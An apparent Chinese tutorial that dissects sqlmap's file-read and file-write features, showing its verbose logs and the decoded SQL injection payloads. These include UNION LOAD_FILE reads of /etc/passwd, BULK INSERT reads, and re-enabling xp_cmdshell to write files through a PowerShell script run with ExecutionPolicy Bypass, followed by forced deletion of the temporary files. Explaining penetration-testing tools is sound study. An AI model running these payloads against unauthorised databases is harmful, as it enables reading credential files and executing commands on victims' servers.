【Sqlmap】file-read and file-write

–file-read


当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。
Mysql

E:\Python27\sqlmap>python sqlmap.py -r r.txt --file-read "/etc/passwd" -v 3
[14:36:26] [INFO] fingerprinting the back-end DBMS operating system
[14:36:26] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71706b7871,(CASE WHEN (0x57=UPPER(MID(@@version_compile_os,1,1))) THEN 1 ELSE 0 END),0x71707a7a71)-- skrs

[14:36:26] [WARNING] reflective value(s) found and filtering out
[14:36:26] [DEBUG] performed 1 queries in 0.02 seconds
[14:36:26] [INFO] the back-end DBMS operating system is Linux
[14:36:26] [DEBUG] going to read the file with a non-stacked query SQL injection technique
[14:36:26] [INFO] fetching file: '/etc/passwd'
[14:36:26] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x71706b7871,IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),0x20),0x71707a7a71)-- pgzu
[14:36:26] [DEBUG] performed 1 queries in 0.02 seconds

 

Mssql
BULK INSERT以用户指定的格式复制一个数据文件至数据库表或视图中。

[14:53:20] [INFO] fetching file: 'C:/pass.txt'
[14:53:20] [PAYLOAD] xxxxx';DROP TABLE sqlmapfile--
[14:53:20] [PAYLOAD] xxxxx';CREATE TABLE sqlmapfile(data text)--
[14:53:20] [PAYLOAD] xxxxx';DROP TABLE sqlmapfilehex--
[14:53:20] [PAYLOAD] xxxxx';CREATE TABLE sqlmapfilehex(id INT IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096))--
[14:53:20] [DEBUG] loading the content of file 'C:/pass.txt' into support table
[14:53:20] [PAYLOAD] xxxxx';BULK INSERT sqlmapfile FROM 'C:/pass.txt' WITH (CODEPAGE='RAW', FIELDTERMINATOR='ECPYscXqbX',ROWTERMINATOR='mrvcIRNcNx')--

然后是转换为16进制

[14:53:20] [PAYLOAD] xxxxx';DECLARE @charset VARCHAR(16) DECLARE @counter INT DECLARE @hexstr VARCHAR(4096) DECLARE @length INT DECLARE @chunk INT SET @charset = '0123456789ABCDEF' SET @counter = 1 SET @hexstr = '' SET @length = (SELECT DATALENGTH(data) FROM sqlmapfile) SET @chunk = 1024 WHILE (@counter <= @length) BEGIN DECLARE @tempint INT DECLARE @firstint INT DECLARE @secondint INT SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(data, @counter, 1)) FROM sqlmapfile)) SET @firstint = floor(@tempint/16) SET @secondint = @tempint - (@firstint * 16) SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) SET @counter = @counter + 1 IF @counter % @chunk = 0 BEGIN INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) SET @hexstr = '' END END IF @counter % (@chunk) != 0 BEGIN INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) END --

这段太长,实际执行的是:

DECLARE @charset VARCHAR(16) 
DECLARE @counter INT 
DECLARE @hexstr VARCHAR(4096) 
DECLARE @length INT 
DECLARE @chunk INT 
SET @charset = '0123456789ABCDEF' 
SET @counter = 1 
SET @hexstr = '' 
SET @length = (SELECT DATALENGTH(data) FROM sqlmapfile) 
SET @chunk = 1024 
WHILE (@counter <= @length) 
BEGIN 
DECLARE @tempint INT 
DECLARE @firstint INT 
DECLARE @secondint INT 
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(data, @counter, 1)) FROM sqlmapfile)) 
SET @firstint = floor(@tempint/16) 
SET @secondint = @tempint - (@firstint * 16) 
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1) 
SET @counter = @counter + 1 
IF @counter % @chunk = 0 
BEGIN 
INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) SET @hexstr = '' 
END 
END 
IF @counter % (@chunk) != 0 
BEGIN 
INSERT INTO sqlmapfilehex(data) VALUES(@hexstr) 
END --

 

[14:53:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[14:53:20] [PAYLOAD] xxxxx' AND 4689 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapfilehex)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- jpEC

[14:53:20] [DEBUG] performed 1 queries in 0.13 seconds
[14:53:20] [PAYLOAD] xxxxx' AND 3925 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),
CHAR(32))),1,1024) FROM sqlmapfilehex WHERE data NOT IN (SELECT TOP 0 data FROM sqlmapfilehex ORDER BY id ASC) ORDER BY id ASC)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- pyFU

 

–file-write,–file-dest


当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。
Mysql
Mysql使用的是into dumpfile。

E:\Python27\sqlmap>python sqlmap.py -r r.txt --file-write "C:\pass.txt" --file-dest "/tmp/123" -v 3
[15:49:12] [INFO] fingerprinting the back-end DBMS operating system
[15:49:12] [DEBUG] performed 0 queries in 0.00 seconds
[15:49:12] [INFO] the back-end DBMS operating system is Linux
[15:49:12] [DEBUG] going to upload the file 'binary' with UNION query SQL injection technique
[15:49:12] [DEBUG] encoding file to its hexadecimal string value
[15:49:12] [DEBUG] exporting the binary file content to file '/tmp/123'
[15:49:12] [PAYLOAD] -7595' UNION ALL SELECT 0x48656865313233343536,NULL INTO DUMPFILE '/tmp/123'-- JTLs

Mssql
Mssql上传文件需要使用xp_cmdshell,首先是启用xp_cmdshell

[15:52:01] [PAYLOAD] xxxxx';DECLARE @rkfp VARCHAR(8000);SET @rkfp=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @rkfp--
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n]
[15:52:20] [DEBUG] configuring xp_cmdshell using sp_configure stored procedure
[15:52:20] [PAYLOAD] xxxxx';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE--
[15:52:20] [PAYLOAD] xxxxx';DECLARE @aapn VARCHAR(8000);SET @aapn=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @aapn--
[15:52:30] [INFO] xp_cmdshell re-enabled successfully
[15:52:30] [DEBUG] creating a support table to write commands standard output to

然后测试xp_cmdshell是否可用

[15:52:30] [PAYLOAD] xxxxx';DROP TABLE sqlmapoutput--
[15:52:30] [PAYLOAD] xxxxx';CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--
[15:52:30] [INFO] testing if xp_cmdshell extended procedure is usable
[15:52:30] [PAYLOAD] xxxxx';DECLARE @umst VARCHAR(8000);SET @umst=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @umst--
[15:52:30] [PAYLOAD] xxxxx' AND 7646 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32))
FROM sqlmapoutput)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- JgAK
[15:52:30] [INFO] the SQL query used returns 1 entries
[15:52:30] [PAYLOAD] xxxxx' AND 8217 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),
CHAR(32))),1,1024) FROM sqlmapoutput WHERE id NOT IN (SELECT TOP 0 id FROM sqlmapoutput ORDER BY id) ORDER BY id)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(1
13)))-- zCxp
[15:52:30] [DEBUG] performed 2 queries in 0.12 seconds
[15:52:30] [PAYLOAD] xxxxx';DELETE FROM sqlmapoutput--
[15:52:30] [INFO] xp_cmdshell extended procedure is usable

然后会查找MSSQL的日志目录,实际执行查询是:

select SERVERPROPERTY('ErrorLogFileName')
[15:52:30] [DEBUG] identifying Microsoft SQL Server error log directory that sqlmap will use to store temporary files with commands' output
[15:52:30] [PAYLOAD] xxxxx' AND 9706 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT SUBSTRING((ISNULL(CAST(SERVERPROPERTY(CHAR(69)+CHAR(114)+CHAR(114)+CHAR(111)+CHAR(114)+CHAR(76)+CHAR(111)+CHAR(103)+CHAR(70)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(78)+CHAR(97)+CHAR(109)+CHAR(101)) AS NVARCHAR(4000)),CHAR(32))),1,1024))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))-- weXH
[15:52:30] [INFO] retrieved: E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG
[15:52:30] [DEBUG] performed 1 queries in 0.03 seconds
[15:52:30] [DEBUG] going to use 'E:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log' as temporary files directory

写入文件到Log目录

[15:52:30] [INFO] using PowerShell to write the binary file content to file 'C:\666.txt'
[15:52:30] [DEBUG] uploading the base64-encoded file to E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt, please wait..
[15:52:30] [PAYLOAD] xxxxx';DECLARE @dsqz VARCHAR(8000);SET @dsqz=0x6563686f205347566f5a5445794d7a51314e673d3d203e3e2022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70666768706c2e74787422;EXEC master..xp_cmdshell @dsqz--

实际执行的命令是:

echo SGVoZTEyMzQ1Ng== >> "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt"

然后使用Powershell解码Base64文件,首先写入powershell脚本

[15:52:30] [DEBUG] uploading the PowerShell base64-decoding script to E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1
[15:52:30] [PAYLOAD] xxxxx';DECLARE @iumo VARCHAR(8000);SET @iumo=0x6563686f2024426173653634203d204765742d436f6e74656e74202d506174682022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70666768706c2e747874223b2024426173653634203d2024426173653634202d7265706c616365202260747c606e7c6072222c22223b2024436f6e74656e74203d205b53797374656d2e436f6e766572745d3a3a46726f6d426173653634537472696e672824426173653634293b205365742d436f6e74656e74202d506174682022433a5c3636362e74787422202d56616c75652024436f6e74656e74202d456e636f64696e672042797465203e3e2022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d707073657067732e70733122;EXEC master..xp_cmdshell @iumo--
[15:52:30] [DEBUG] executing the PowerShell base64-decoding script to write the C:\666.txt file, please wait..

实际执行的是

echo $Base64 = Get-Content -Path "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt"; $Base64 = $Base64 -replace "`t|`n|`r",""; $Content = [System.Convert]::FromBase64String($Base64); Set-Content -Path "C:\666.txt" -Value $Content -Encoding Byte >> "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1"

然后执行该脚本,并删除遗留文件。

[15:52:30] [PAYLOAD] xxxxx';DECLARE @wpll VARCHAR(8000);SET @wpll=0x706f7765727368656c6c202d457865637574696f6e506f6c69637920427950617373202d46696c652022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d707073657067732e7073312220262064656c202f46202f512022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70666768706c2e7478742220262064656c202f46202f512022453a5c50726f6772616d2046696c65735c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d707073657067732e70733122;EXEC master..xp_cmdshell @wpll--

实际执行的是

powershell -ExecutionPolicy ByPass -File "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1" & del /F /Q "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfghpl.txt" & del /F /Q "E:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmppsepgs.ps1"